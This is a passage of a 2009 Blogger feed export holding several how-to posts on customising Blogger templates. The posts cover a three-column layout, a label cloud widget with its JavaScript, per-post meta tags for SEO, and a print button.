153, 0);"&gt;Green&lt;/span&gt; to &lt;span style="font-weight: bold;"&gt;ABOVE&lt;/span&gt; div id='main-wrap1'.&lt;br /&gt;&lt;br /&gt;This will look like&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;&lt;br /&gt;&lt;br /&gt;&amp;lt;div id='newsidebar-wrap'&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;&amp;lt;div id='newsidebar-wrap1'&amp;gt;&amp;lt;div id='newsidebar-wrap2'&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;&amp;lt;b:section class='sidebar' id='newsidebar' preferred='yes'&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;&amp;lt;b:widget id='NewProfile' locked='false' title='About Me' type='Profile'/&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;&amp;lt;/b:section&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;&amp;lt;/div&amp;gt;&amp;lt;/div&amp;gt;&amp;lt;/div&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;&amp;lt;div id='main-wrap1'&amp;gt;&amp;lt;div id='main-wrap2'&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;&amp;lt;b:section class='main' id='main' showaddelement='no'&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;&amp;lt;b:widget id='Blog1' locked='true' title='Blog Posts' type='Blog'/&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;&amp;lt;/b:section&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;&amp;lt;/div&amp;gt;&amp;lt;/div&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;&amp;lt;div id='sidebar-wrap'&amp;gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;It is done. Now save your template and look for changes.&lt;br /&gt;It will look like -&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.videoactive.blogspot.com/"&gt;THREE column Rounders 2 Template&lt;/a&gt;&lt;br /&gt;&lt;a href="http://videoactive2.blogspot.com/"&gt;THREE column Rounders 2 Template Blue&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4284377048633026062-1785966484933897688?l=infinitytricks.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infinitytricks.blogspot.com/feeds/1785966484933897688/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4284377048633026062&amp;postID=1785966484933897688' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/1785966484933897688'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/1785966484933897688'/><link rel='alternate' type='text/html' href='http://infinitytricks.blogspot.com/2009/07/create-your-own-three-column-rounders-2.html' title='Create your own THREE column Rounders 2 Template for blogger.'/><author><name>Lovana das</name><uri>http://www.blogger.com/profile/03880679332199590678</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4284377048633026062.post-5961604809714667565</id><published>2009-07-26T10:15:00.013-07:00</published><updated>2009-07-26T10:15:33.215-07:00</updated><title type='text'>Label Cloud or Tag Cloud widget for Blogger</title><content type='html'>In most websites there is Label/ Tag clouds  embedded as shown in following image.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://medimania.blogspot.com/"&gt;&lt;img style="cursor: pointer; width: 338px; height: 280px;" src="http://1.bp.blogspot.com/_tbHfaj1A058/Sg0Pv4nSwII/AAAAAAAAGw8/oG4Fiaq45Bk/s400/Label+Cloud+widget+for+Blogger.JPG" alt="" id="BLOGGER_PHOTO_ID_5335938448829366402" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;And now  a Blogger can do the same by using following easy steps.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://medimania.blogspot.com/"&gt;See the Demo of Label or Tag Cloud Widget&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;At least one of your labels has more than one entry. A bug in the script causes it to fail when all the labels have only one entry.Also, make sure that none of your labels contain quote marks " .&lt;br /&gt;&lt;br /&gt;1. Login to Blogger &gt;&gt; Layout &gt;&gt; Page Elements &gt;&gt; Add a Gadget &gt;&gt; Labels. A new window will open.  Sorting should be  Alphabetically and now hit SAVE.  Now go to Edit HTML. Download Full Template for backup.&lt;br /&gt;&lt;br /&gt;2.  Now look for this tag&lt;br /&gt;&lt;br /&gt;]]&amp;gt;&amp;lt;/b:skin&amp;gt;&lt;br /&gt;&lt;br /&gt;And place following code before that tag.&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;/* Label Cloud Styles&lt;br /&gt;----------------------------------------------- */&lt;br /&gt;#labelCloud {text-align:center;font-family:arial,sans-serif;}&lt;br /&gt;#labelCloud .label-cloud li{display:inline;background-image:none !important;padding:0 5px;margin:0;vertical-align:baseline !important;border:0 !important;}&lt;br /&gt;#labelCloud ul{list-style-type:none;margin:0 auto;padding:0;}&lt;br /&gt;#labelCloud a img{border:0;display:inline;margin:0 0 0 3px;padding:0}&lt;br /&gt;#labelCloud a{text-decoration:none}&lt;br /&gt;#labelCloud a:hover{text-decoration:underline}&lt;br /&gt;#labelCloud li a{}&lt;br /&gt;#labelCloud .label-cloud {}&lt;br /&gt;#labelCloud .label-count {padding-left:0.2em;font-size:9px;color:#000}&lt;br /&gt;#labelCloud .label-cloud li:before{content:"" !important} &lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;3. Now add following code After&lt;br /&gt;&lt;br /&gt;]]&amp;gt;&amp;lt;/b:skin&amp;gt;&lt;br /&gt;&lt;br /&gt;and before &amp;lt;/head&amp;gt; tag.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;&amp;lt;script type='text/javascript'&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;// Label Cloud User Variables&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;var cloudMin = 1;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;var maxFontSize = 20;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;var maxColor = [0,0,255];&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;var minFontSize = 10;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;var minColor = [0,0,0];&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;var lcShowCount = false;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Above code is the variable section.&lt;br /&gt;&lt;br /&gt;4. Now look for following&lt;br /&gt;&lt;br /&gt;&amp;lt;b:widget id='Label1' locked='false' title='Labels' type='Label'/&amp;gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Now copy the following code and replace it with above line.&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;&amp;lt;b:widget id='Label1' locked='false' title='Label Cloud' type='Label'&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;&amp;lt;b:includable id='main'&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;  &amp;lt;b:if cond='data:title'&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;    &amp;lt;h2&amp;gt;&amp;lt;data:title/&amp;gt;&amp;lt;/h2&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;  &amp;lt;/b:if&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;  &amp;lt;div class='widget-content'&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;  &amp;lt;div id='labelCloud'/&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;&amp;lt;script type='text/javascript'&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;// Don't change anything past this point -----------------&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;// Cloud function s() ripped from del.icio.us&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;function s(a,b,i,x){&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;      if(a&amp;amp;gt;b){&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;          var m=(a-b)/Math.log(x),v=a-Math.floor(Math.log(i)*m)&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;             }&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;      else{&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;          var m=(b-a)/Math.log(x),v=Math.floor(Math.log(i)*m+a)&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;          }&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;      return v&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;   }&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;var c=[];&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;var labelCount = new Array();  &lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;var ts = new Object;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;&amp;lt;b:loop values='data:labels' var='label'&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;var theName = &amp;amp;quot;&amp;lt;data:label.name/&amp;gt;&amp;amp;quot;;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;ts[theName] = &amp;lt;data:label.count/&amp;gt;;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;&amp;lt;/b:loop&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;for (t in ts){&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;     if (!labelCount[ts[t]]){&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;           labelCount[ts[t]] = new Array(ts[t])&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;           }&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;        }&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;var ta=cloudMin-1;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;tz = labelCount.length - cloudMin;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;lc2 = document.getElementById('labelCloud');&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;ul = document.createElement('ul');&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;ul.className = 'label-cloud';&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;for(var t in ts){&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;    if(ts[t] &amp;amp;lt; cloudMin){&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;       continue;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;       }&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;    for (var i=0;3 &amp;amp;gt; i;i++) {&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;             c[i]=s(minColor[i],maxColor[i],ts[t]-ta,tz)&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;              }      &lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;         var fs = s(minFontSize,maxFontSize,ts[t]-ta,tz);&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;         li = document.createElement('li');&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;         li.style.fontSize = fs+'px';&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;         li.style.lineHeight = '1';&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;         a = document.createElement('a');&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;         a.title = ts[t]+' Posts in '+t;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;         a.style.color = 'rgb('+c[0]+','+c[1]+','+c[2]+')';&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;         a.href = '/search/label/'+encodeURIComponent(t);&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;         if (lcShowCount){&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;             span = document.createElement('span');&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;             span.innerHTML = '('+ts[t]+') ';&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;             span.className = 'label-count';&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;             a.appendChild(document.createTextNode(t));&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;             li.appendChild(a);&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;             li.appendChild(span);&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;             }&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;          else {&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;             a.appendChild(document.createTextNode(t));&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;             li.appendChild(a);&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;             }&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;         ul.appendChild(li);&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;         abnk = document.createTextNode(' ');&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;         ul.appendChild(abnk);&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;    }&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;  lc2.appendChild(ul);    &lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;&amp;lt;noscript&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;    &amp;lt;ul&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;    &amp;lt;b:loop values='data:labels' var='label'&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;      &amp;lt;li&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;        &amp;lt;b:if cond='data:blog.url == data:label.url'&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;          &amp;lt;data:label.name/&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;        &amp;lt;b:else/&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;          &amp;lt;a expr:href='data:label.url'&amp;gt;&amp;lt;data:label.name/&amp;gt;&amp;lt;/a&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;        &amp;lt;/b:if&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;        (&amp;lt;data:label.count/&amp;gt;)&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;      &amp;lt;/li&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;    &amp;lt;/b:loop&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;    &amp;lt;/ul&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;&amp;lt;/noscript&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;    &amp;lt;b:include name='quickedit'/&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;  &amp;lt;/div&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;&amp;lt;/b:includable&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;&amp;lt;/b:widget&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;It's done !&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;You can configurthe colors and font size to match your blog. At no. 3 step you added these variables&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;&amp;lt;script type='text/javascript'&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;// Label Cloud User Variables&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;var cloudMin = 1;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;var maxFontSize = 20;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;var maxColor = [0,0,255];&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;var minFontSize = 10;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;var minColor = [0,0,0];&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;var lcShowCount = false;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;var cloudMin= 1;&lt;br /&gt;This enable you to limit the no. of labels shown. If you keep this setting at 1 then it will show all the labels.  If you enter in a higher number, then only labels that have at least that number of entries will appear in the cloud.&lt;br /&gt;&lt;br /&gt;maxFontSize - sets the size  of the label with the most amount entries.&lt;br /&gt;maxColor - sets the color of that entry (in RGB format).&lt;br /&gt;&lt;br /&gt;minFontSize - sets the size  of the label with the least entries.&lt;br /&gt;minColor - sets the color of that entry (in RGB format).&lt;br /&gt;&lt;br /&gt;lcShowCount&lt;br /&gt;If its false then label count is off and if it is true then label count is on.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4284377048633026062-5961604809714667565?l=infinitytricks.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infinitytricks.blogspot.com/feeds/5961604809714667565/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4284377048633026062&amp;postID=5961604809714667565' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/5961604809714667565'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/5961604809714667565'/><link rel='alternate' type='text/html' href='http://infinitytricks.blogspot.com/2009/07/label-cloud-or-tag-cloud-widget-for.html' title='Label Cloud or Tag Cloud widget for Blogger'/><author><name>Lovana das</name><uri>http://www.blogger.com/profile/03880679332199590678</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_tbHfaj1A058/Sg0Pv4nSwII/AAAAAAAAGw8/oG4Fiaq45Bk/s72-c/Label+Cloud+widget+for+Blogger.JPG' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4284377048633026062.post-3542993228191225450</id><published>2009-07-26T10:15:00.011-07:00</published><updated>2009-07-26T10:15:32.093-07:00</updated><title type='text'>How to add different meta tags to diffrent posts of Blogger</title><content type='html'>Adding Meta tags is one good procedure for SEO. These meta tags should be unique for each posts and that makes the search engines to know more about your individual blog posts and make them crawl and index your pages better and it also improves your Search engine rankings.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Procedure to add meta tags -&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;This is for Home Page&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Login to Blogger &gt; Layout &gt; Edit HTML.&lt;br /&gt;&lt;br /&gt;Search for following&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 102);"&gt;&amp;lt;b:include data='blog' name='all-head-content'/&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Add following code JUST BELOW above line&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 102);"&gt;&amp;lt;b:if cond='data:blog.url == "http://free-blogger-help.blogspot.com/"&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 102);"&gt;&amp;lt;meta content='DESCRIPTION' name='description'/&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 102);"&gt;&amp;lt;meta content='KEYWORDS' name='keywords'/&amp;gt; &amp;lt;/b:if&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Now procedure to add meta tag to any post of your website e.g. http://free-blogger-help.blogspot.com/2008/07/increase-traffic-to-your-blogger-blog.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 102);"&gt;&amp;lt;b:if cond='data:blog.url == "http://free-blogger-help.blogspot.com/2008/08/list-of-useful-blogger-widgets.html"&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 102);"&gt;&amp;lt;meta content='Type you post description here.' name='description'/&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 102);"&gt;&amp;lt;meta content='Type, the, post, keywords, here' name='keywords'/&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 102);"&gt;&amp;lt;/b:if&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Repeat above step for as many blog posts you want to have unique META Tags for.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4284377048633026062-3542993228191225450?l=infinitytricks.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infinitytricks.blogspot.com/feeds/3542993228191225450/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4284377048633026062&amp;postID=3542993228191225450' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/3542993228191225450'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/3542993228191225450'/><link rel='alternate' type='text/html' href='http://infinitytricks.blogspot.com/2009/07/how-to-add-different-meta-tags-to.html' title='How to add different meta tags to diffrent posts of Blogger'/><author><name>Lovana das</name><uri>http://www.blogger.com/profile/03880679332199590678</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4284377048633026062.post-5664608317128374335</id><published>2009-07-26T10:15:00.009-07:00</published><updated>2009-07-26T10:15:31.219-07:00</updated><title type='text'>How to Add Print Button to your Blogger post.</title><content type='html'>Like other popular websites now you can add Print Button to your Blogger blog so that visitors/users will be able to print your blog article by one mouse click.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://medimania.blogspot.com/"&gt;See Demo site with Print Button&lt;/a&gt; (Go and click on any post).&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Step by step Procedure&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;1. Go to Blogger Dashboard &gt;&gt; Layout &gt;&gt; Edit HTML &gt;&gt; Download Full Template ( for backup) &gt;&gt; Expand Widget Template.&lt;br /&gt;&lt;br /&gt;2. Look for &lt;span style="font-weight: bold;"&gt;&amp;lt;p&amp;gt;&amp;lt;data:post.body/&amp;gt;&amp;lt;/p&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Now replace above code with any one of the following codes.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_tbHfaj1A058/Sh-gUeUEVAI/AAAAAAAAG2U/63cA1lHPLWw/s1600-h/printButton1.png"&gt;&lt;img style="cursor: pointer; width: 46px; height: 42px;" src="http://3.bp.blogspot.com/_tbHfaj1A058/Sh-gUeUEVAI/AAAAAAAAG2U/63cA1lHPLWw/s400/printButton1.png" alt="" id="BLOGGER_PHOTO_ID_5341163956679758850" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 102);"&gt;&amp;lt;span class='noprint'&amp;gt;&amp;lt;data:post.body/&amp;gt;&amp;lt;/span&amp;gt;&lt;/span&gt; &lt;span style="color: rgb(51, 102, 102);"&gt;&amp;lt;b:if cond='data:blog.pageType == &amp;amp;quot;item&amp;amp;quot;'&amp;gt; &amp;lt;a href='javascript:window.print()'&amp;gt;&amp;lt;img src='http://i475.photobucket.com/albums/rr115/djyano21/printButton.png'/&amp;gt;&amp;lt;/a&amp;gt;&amp;lt;/b:if&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_tbHfaj1A058/Sh-gq-qiQgI/AAAAAAAAG2c/NdRc7hYAZHo/s1600-h/printButton1.png"&gt;&lt;img style="cursor: pointer; width: 48px; height: 17px;" src="http://3.bp.blogspot.com/_tbHfaj1A058/Sh-gq-qiQgI/AAAAAAAAG2c/NdRc7hYAZHo/s400/printButton1.png" alt="" id="BLOGGER_PHOTO_ID_5341164343321051650" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 102);"&gt;&amp;lt;span class='noprint'&amp;gt;&amp;lt;data:post.body/&amp;gt;&amp;lt;/span&amp;gt;&lt;/span&gt; &lt;span style="color: rgb(51, 102, 102);"&gt;&amp;lt;b:if cond='data:blog.pageType == &amp;amp;quot;item&amp;amp;quot;'&amp;gt;&lt;/span&gt; &lt;span style="color: rgb(51, 102, 102);"&gt;&amp;lt;a href='javascript:window.print()'&amp;gt;&amp;lt;img src='http://i475.photobucket.com/albums/rr115/djyano21/print_button.gif'/&amp;gt;&amp;lt;/a&amp;gt;&amp;lt;/b:if&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;br 